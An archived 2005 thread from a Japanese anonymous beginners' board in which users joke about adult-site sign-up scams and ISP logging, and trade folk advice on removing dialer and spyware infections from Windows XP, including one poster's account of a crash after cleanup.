786 :ひよこ名無しさん:2005/09/01(木) 16:01:50 ID:WIWYFvuW
正式なアダルトサイトでも利用規約のあとに登録ボタンを押しただけで
登録されてしまうんですか?

787 :ひよこ名無しさん:2005/09/01(木) 17:11:17 ID:???
このエロガッパめ!

788 :ひよこ名無しさん:2005/09/01(木) 17:57:48 ID:YU+H0D9R
インターネットのプロバイダの利用料金明細って
見たページのurlとか記録されてるのかな?
だとしたらガクブル。

789 :ひよこ名無しさん:2005/09/01(木) 17:59:12 ID:???
>>788
グッドアイディア プロバに言っておこうっと

790 : ◆N9P3SuvBPo :2005/09/01(木) 18:03:06 ID:???
ちょっと良い?
>744
>Logfile of HijackThis v1.98.2
ログ貼ったのはいいけど、HijackThisのバージョンが古いです。
…OS、WindowsXP使ってるんだよね。
じゃあ、>740の試しにやってみて。

791 :ひよこ名無しさん:2005/09/01(木) 18:10:03 ID:???
( −=・=− 3 −=・=− ) エェー 

792 :ひよこ名無しさん:2005/09/01(木) 18:12:13 ID:YU+H0D9R
>>789
え、なに
ホントに記載されてるの!?ギャー
まさかあんな大量の情報を電話の通話明細みたいに
記載するのは無理だとおもうけど・・

793 :ひよこ名無しさん:2005/09/01(木) 18:42:49 ID:???
>750
>782
このスケベ野郎どもが

ダイヤラー関係はアンチウイルスソフトでは検出しない悪寒
まずネットワークとダイヤルアップ接続の中で、変な名前(XXXDialerとか)のヤツを削除
次にC>Windows>Downloaded Program Filesの中身を調べる
入り込んでるActivXを全部右クリック>プロパティ>コードベース
その中でエロサイトっぽい名前が入ってるヤツや不明としか記載されていないのは削除
判断がつかなかったらコードベース全部ここに貼れ

それでも直らなかったら、リカバリ覚悟でCドライブの名称不明かつ出所不明なフォルダを全部削除
間違えるなよ、フォルダだからな

え、何でオレがそんな方法を知ってるかって?
オレの友達がその手でやられたんだよ。友達が
友達だぞ!

794 : ◆N9P3SuvBPo :2005/09/01(木) 20:10:54 ID:???
794(泣くよ)

ビエエエエエン!

795 :ひよこ名無しさん:2005/09/01(木) 20:21:18 ID:???
       , '´         :::::::::::ヽ、
      /     ,/ ||| \,  ::::::::::ヽ
      |   =="       `== ::::::::|
      |   -=・=-′ ヽ-=・=- :::::::::|
      |               ::::::::::|   え?
      |     (_人_)   ::::::::|
       'ヽ__        :::::::::::/

796 :エロママンガ上げてます。リクどうぞ:2005/09/01(木) 22:54:45 ID:ink3m/Xb
(-。-)y-゜゜゜抜けテルエロ漫画刑事 秋特番01
http://ex11.2ch.net/test/read.cgi/news4vip/1125327540/

797 :782:2005/09/01(木) 23:09:59 ID:???
>>793
さっきシステムの復元で1ヶ月くらい前にタイムスリップしたので(多分)大丈夫です!
アドバイスありがとうございます

798 :ひよこ名無しさん:2005/09/01(木) 23:31:38 ID:???
>>797
うむ。

799 :ひよこ名無しさん:2005/09/01(木) 23:33:20 ID:wPTnNU3R
 ,.:::.⌒⌒:::::ヽ
(::::::::::::::::::::::::::::)
(::::::::::::::人:::::::::ノ
(:::: ( ・∀・):ノ  
  ̄/ つとl    
   しー-J

800 :ひよこ名無しさん:2005/09/01(木) 23:37:18 ID:wPTnNU3R
 ,.::.⌒⌒::::ヽ
(::::::::::::::::)
(:::::::人:::::ノ
(:: ( ・∀・):ノ  
  ̄/ つとl    
   しー-J

801 :750:2005/09/02(金) 03:26:02 ID:TNAiRcjo
えーと、帰宅後にマイクロソフトのアンチスパイウェア
つーのを落としてきて英語だらけなのを無視して適当に実行!
・・msnなんとかが150くらい、Xダイアラが2つ出ました。
まだ心配だったのでオンラインスパイウェアスキャン決行、
忘れたけど疑わしいのが再び→駆除→再起動。
・・・ブルー背景北
ヤフーツールバーが壊れた、他にも色々壊れてます表示w
>>793
ありがと、友達にも気をつけるように言わないと駄目だね
・・・ってなんでやねん!




笑いのセンスなくて5面

802 :ひよこ名無しさん:2005/09/02(金) 03:34:11 ID:???
駆除はできても壊れたファイルはそのままだからね
事故車と同じ、バックアップは念入りに。

803 :ひよこ名無しさん:2005/09/02(金) 06:03:30 ID:???
エロサイト見るんだったらもう一台PC買え。
それとwebはIEで見るな、他のブラウザ使え。

315 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)